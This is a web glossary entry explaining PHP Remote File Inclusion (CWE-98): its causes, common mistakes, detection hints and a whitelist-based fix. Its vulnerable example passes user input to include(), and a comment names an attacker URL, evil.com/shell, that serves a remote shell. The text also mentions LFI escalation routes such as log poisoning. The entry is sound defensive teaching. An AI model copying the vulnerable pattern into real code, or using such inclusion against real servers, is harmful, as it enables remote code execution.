CodeClarityLab / Glossary
Ctrl K
← CodeClarityLab Home
Browse by Category
+ added · updated 7d
⚖ Terms of Use
← Back to glossary

Remote File Inclusion (RFI)

security CWE-98 OWASP A3:2021 CVSS 9.8 PHP 5.0+ Intermediate

Also Known As

RFI Remote File Inclusion remote include

TL;DR

An attacker tricks include() or require() into loading a PHP file from an attacker-controlled remote URL, achieving code execution.

Explanation

RFI is enabled by allow_url_include=On (disabled by default since PHP 5.2) and user-controlled include paths. An attacker supplies a URL pointing to a remote PHP file they control — the server fetches and executes it with full server privileges. Even with allow_url_include=Off, LFI can escalate to code execution via log poisoning, PHAR injection, or /proc/self/environ. Prevention: always disable allow_url_include, never pass user input to include/require, use a whitelist of permitted file identifiers, and validate paths with realpath() against an allowed prefix.

Common Misconception

allow_url_include = Off fully prevents file inclusion attacks. It prevents remote URL inclusion but not local file inclusion (LFI) — and LFI can itself lead to RCE via log poisoning or PHP session file inclusion.

Why It Matters

Fetching a remote PHP file via include() gives the attacker full code execution; even local file inclusion can expose source code or log-poisoning chains.

Common Mistakes

  • Using user input directly in include(), require(), or include_once() paths.
  • Leaving allow_url_include = On in php.ini — this enables RFI entirely.
  • Path traversal filtering that misses double-encoded sequences like ..%2F.
  • Using a whitelist of partial filenames without verifying the full resolved path via realpath().

Code Examples

✗ Vulnerable 
include($_GET['page'] . '.php'); // attacker passes http://evil.com/shell
✓ Fixed 
$allowed = ['home', 'about', 'contact'];
$page = in_array($_GET['page'], $allowed) ? $_GET['page'] : 'home';
include __DIR__ . '/pages/' . $page . '.php';
Added 15 Mar 2026
Edited 22 Mar 2026
Views 31

Curated in Warsaw under one editorial standard. 1,444 terms, single voice.  About this reference →

Rate this term
No ratings yet
🤖 AI Guestbook educational data only
| |
Last 30 days
0 pings W 0 pings T 0 pings F 0 pings S 0 pings S 0 pings M 0 pings T 0 pings W 0 pings T 0 pings F 0 pings S 3 pings S 0 pings M 0 pings T 0 pings W 2 pings T 0 pings F 0 pings S 3 pings S 1 ping M 1 ping T 0 pings W 0 pings T 0 pings F 1 ping S 1 ping S 0 pings M 0 pings T 0 pings W 1 ping T
Agents 1
No pings yesterday
Amazonbot 7 ChatGPT 4 Google 3 Perplexity 3 SEMrush 3 Unknown AI 2 Majestic 1 Ahrefs 1
Also referenced
allow_url_fopen / allow_url_include 101 php.ini Security Settings 39 Local File Inclusion (LFI) 30 Path Traversal 27
How they use it
crawler 22 crawler_json 1 pre-tracking 1
Related categories
php 6.3k security 4k
DEV INTEL Tools & Severity
🔴 Critical ⚙ Fix effort: Low
⚡ Quick Fix
Set allow_url_include=Off in php.ini (it's off by default since PHP 5.2) — remote file inclusion is only possible if this setting is enabled, so disabling it prevents the entire class of attacks
📦 Applies To
PHP 5.0+ web
🔗 Prerequisites
🔍 Detection Hints
allow_url_include=On in php.ini; include or require with user-controlled URL; including remote scripts
Auto-detectable: ✓ Yes semgrep lynis phpstan
⚠ Related Problems
🤖 AI Agent
Confidence: High False Positives: Low ✗ Manual fix Fix: High Context: Function Tests: Update
CWE-98 CWE-829
✓ schema.org compliant